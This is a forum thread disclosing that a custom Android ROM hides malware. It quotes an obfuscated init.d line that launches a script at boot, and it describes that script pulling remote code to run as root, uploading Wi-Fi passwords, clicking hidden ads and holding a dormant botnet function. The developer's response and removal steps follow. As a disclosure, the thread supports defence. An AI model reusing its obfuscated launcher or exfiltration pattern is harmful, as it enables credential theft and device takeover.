This firmware is malware.
This firmware is malware.
At least it downloads ads. But also it allows the author to take control on your phone.
Just see files /system/bin/api and /system/bin/apiget (also in zip in META-INF/com/google/android/sMiUI-kitchen/tmp/system/bin/).
Scripts from /system/etc/init.d are run at system start. There is a script "01sMIUI_optimizations". It contains a line
echo+sed make string "/system/bin/api" and finally the command is
So it just runs "/system/bin/api". And that script does many bad actions, for example:
- loads new version of the script from https://smiui.net/api and saves it to the system. The author can place there any code and the code will be executed on your phone with root rights!
- it uploads the content of the file "/data/misc/wifi/wpa_supplicant.conf" (your Wi-Fi passwords) to https://smiui.net/api1.php
- it loads some ads (functions func_PROP, func_REV, func_TOTAL) in the background. Not only when you visit smiui.net, but in any time, constantly (when it receives "START" from their server)!
- there is also very very bad function func_SRV (+func_FILES), but it is commented (does not run). It makes your phone a part of the botnet! It loads some binaries (they do not exists for now) and looks like they start some tunnel/proxy on the phone.
This firmware is malware.
At least it downloads ads. But also it allows the author to take control on your phone.
Just see files /system/bin/api and /system/bin/apiget (also in zip in META-INF/com/google/android/sMiUI-kitchen/tmp/system/bin/).
Scripts from /system/etc/init.d are run at system start. There is a script "01sMIUI_optimizations". It contains a line
Code:
/system/bin/sh `echo "binajkdpjni%usr" | sed 's!^\(...\)\(.\)...\(.\)..\(i\).\(...\)$!/\5/\1/\2\3\4!g'`
Code:
/system/bin/sh /system/bin/api- loads new version of the script from https://smiui.net/api and saves it to the system. The author can place there any code and the code will be executed on your phone with root rights!
- it uploads the content of the file "/data/misc/wifi/wpa_supplicant.conf" (your Wi-Fi passwords) to https://smiui.net/api1.php
- it loads some ads (functions func_PROP, func_REV, func_TOTAL) in the background. Not only when you visit smiui.net, but in any time, constantly (when it receives "START" from their server)!
- there is also very very bad function func_SRV (+func_FILES), but it is commented (does not run). It makes your phone a part of the botnet! It loads some binaries (they do not exists for now) and looks like they start some tunnel/proxy on the phone.
Last edited:
Thanks for the warning. I've checked those files and can confirm what @peter232 said.
Stay away from this rom!
EDIT:
Here is the content of the file /system/bin/api : http://pastebin.com/LQqjbcqF
You can see starting line 500 a function that rename your host file (in case you use it to block ads), then request an ad (with some requests back and forth between the ads portal and the smiui site so that the ads server think the request comes from the smiui website), then put back your host file.
This function gets called in an infinite loop (line 599)
Last edited:
S
sebsch1991
Guest
I am totally speachless ... This is the result of accepting help from a stranger who seemed to be just a nice person ...
I developed sMiUI Roms from late 2014, always trying to create something great for the community. I spent so many hours of coding, creating the kitchen, all by myself ...
In 2016 I found someone (John) to help me and after some time I granted him access to all the servers and accounts, just because I couldnt stand it anymore all allone.
Turned out that this was a big mistake . . .
I immediately closed the website until I have researched all his "work" ... On first sight I can say, it seems that on the backend most of his **** did not work. I recommend you to delete /system/bin/api with a root explorer App or completely change your ROM. Flash xiaomi.eu ROM, its great!
Thanks to the guys who found it..
I have to sleep over that, cant believe what just happened with all the work from past 2 years.
EDIT:
I literally spent the whole night in cleaning that **** out of my build environment and the ROM.
I contacted John, but of course, he is not answering. . . Sure, he will never ever get any access to the server again . . .
It seems to be true, he tried to invisibly click some ads and get wifi passwords, but luckily he sucks at coding and neither the ads worked correct nor any of our passwords have been saved into the database.
I removed all the contact points he made on our server.
I cleaned the ROM and uploaded latest version to the kitchen which should be back online soon.
All previous versions have been removed!
SOLUTION :
-Download latst ROM from kitchen.
ALTERNATIVE:
-Download Root Explorer App and delete the following Files "/system/bin/api" "/system/bin/apiget", then reboot your phone. Now you´re safe!
I cannot accept closing all my work because one idiot tried some fraudental **** which resulted in a big fail. World seems to be a bad place . . .
Last edited:
@sebsch1991 We all learn. Thankfully, the problem was discovered by eagle-eyed members before it became a big one!
I would offer to help with the project, but I can't spare the time now. Hopefully you will get some help from some proper "nice" people ...
I would offer to help with the project, but I can't spare the time now. Hopefully you will get some help from some proper "nice" people ...
@sebsch1991
Thank you 1000000 times for your hard work (especially last night)
I hope you will continue your work and find a new coworker. Xiaomi devices would not be the same without sMiui.
Thank you 1000000 times for your hard work (especially last night)
I hope you will continue your work and find a new coworker. Xiaomi devices would not be the same without sMiui.
voetbalremco
Inactive Recognized Developer
Thanks for the good response and dealing with it.
We understand, and please, do not stop with this great project.
We understand, and please, do not stop with this great project.
Hi Sebsch, as the previous users, please keep up the excellent work with your Kitchen!
A little mistake in "evaluation" (faith in Humanity not restored... not cool John...) cannot ruin your Smiui.
I am an avid user, especially for the fantastic battery life with all xiaomi service removed.
Now, just a clarification: I just checked with Root Explorer, and on KENZO with Smiui 6.8.11, there is no trace of those 2 files (api & apiget)...
so the question is: Is it correct to assume that in this version the 2 malicious files were absent? Or can they be in other locations?
Because I really like this version so far, great stability and exceptional battery life, so I really don't want to change!
A little mistake in "evaluation" (faith in Humanity not restored... not cool John...) cannot ruin your Smiui.
I am an avid user, especially for the fantastic battery life with all xiaomi service removed.
Now, just a clarification: I just checked with Root Explorer, and on KENZO with Smiui 6.8.11, there is no trace of those 2 files (api & apiget)...
so the question is: Is it correct to assume that in this version the 2 malicious files were absent? Or can they be in other locations?
Because I really like this version so far, great stability and exceptional battery life, so I really don't want to change!
Last edited:
On my Redmi 2 TD with Smiui 6.5.5, the 2 files are also not in the System, only in the downloaded ROM zip file.
I remember that CM Security showed me the MiBrowser as Malware, so i deinstalled this Browser. It was not so easy because the MiBrowser installed itself the next 2 or 3 restarts.
I remember that CM Security showed me the MiBrowser as Malware, so i deinstalled this Browser. It was not so easy because the MiBrowser installed itself the next 2 or 3 restarts.
Last edited:
Checked the 6.8.11 Mi4C version: no files in the mobile. No concern at moment Sebsch, continue your good job!
G
GuestK00105
Guest
If this john guy put in invisible ads that go through and pay smiui.net how would this benefit only him?
Thats if there is a john
Dont know what to believe im going stick with the original source.
Id be very wary of using any important banking apps on this
Thats if there is a john
Dont know what to believe im going stick with the original source.
Id be very wary of using any important banking apps on this
Last edited:
I installed this ROM as soon as I bought my RN2 and I've been happy about it. Unfortunately, this hack has badly damaged my trust relation with sMiUI. I really think that Sebsch should put an effort in clarifying the issues mentioned by colemanuk. Without such clarification, many sMiUI users will have no choice but to reluctantly switch to a different ROM.
Similar threads
Top Liked Posts
-
There are no posts matching your filters.
-
10This firmware is malware.
This firmware is malware.
At least it downloads ads. But also it allows the author to take control on your phone.
Just see files /system/bin/api and /system/bin/apiget (also in zip in META-INF/com/google/android/sMiUI-kitchen/tmp/system/bin/).
Scripts from /system/etc/init.d are run at system start. There is a script "01sMIUI_optimizations". It contains a lineecho+sed make string "/system/bin/api" and finally the command isCode:/system/bin/sh `echo "binajkdpjni%usr" | sed 's!^\(...\)\(.\)...\(.\)..\(i\).\(...\)$!/\5/\1/\2\3\4!g'`So it just runs "/system/bin/api". And that script does many bad actions, for example:Code:/system/bin/sh /system/bin/api
- loads new version of the script from https://smiui.net/api and saves it to the system. The author can place there any code and the code will be executed on your phone with root rights!
- it uploads the content of the file "/data/misc/wifi/wpa_supplicant.conf" (your Wi-Fi passwords) to https://smiui.net/api1.php
- it loads some ads (functions func_PROP, func_REV, func_TOTAL) in the background. Not only when you visit smiui.net, but in any time, constantly (when it receives "START" from their server)!
- there is also very very bad function func_SRV (+func_FILES), but it is commented (does not run). It makes your phone a part of the botnet! It loads some binaries (they do not exists for now) and looks like they start some tunnel/proxy on the phone.6Hey sebsch1991, just my kudos and thanks for a really nice rom solution! Question for you at the same time. Similar to how you have a check/uncheck system for some apps and mods at this point, would you consider adding on additional options to be able to produce an even cleaner/leaner rom? For example, would it be possible to add check/uncheck options for Calculator, Cloud Print, Mi Account, Mi Drop, Mi VIP, Themes, Updater, Xiaomi Assistant, Xiaomi Service Framework, Yellow Pages, etc. so one could make a super, super clean rom version? Maybe the default would have these items checked when cooking the rom, but they could at least be unchecked by those hoping for something superclean. I realize they can be frozen/uninstalled with the right tools (and that's what I have already done), but not having them installed at all is much more preferable. The above apps/apks are just what stood out to me, but having even more granular control to subtract almost any app would be be awesome! Anyway, I've just made a contribution to your liquid happiness account in hopes that this may help you decide! Thanks again for this fantastic service you are providing!3
Thanks for the warning. I've checked those files and can confirm what @peter232 said.
Stay away from this rom!
EDIT:
Here is the content of the file /system/bin/api : http://pastebin.com/LQqjbcqF
You can see starting line 500 a function that rename your host file (in case you use it to block ads), then request an ad (with some requests back and forth between the ads portal and the smiui site so that the ads server think the request comes from the smiui website), then put back your host file.
This function gets called in an infinite loop (line 599)2
I installed it this morning and so far it is awesome. I went from 6.6.23 to sMIUI 6.6.23 without wiping1
In my view, you will get mega problems with dirty flashing, unless the xiami.eu version that you are flashing is exactly the same base as smiui. For example, if both are based on 6.8.25, then dirty flashing may be possible.
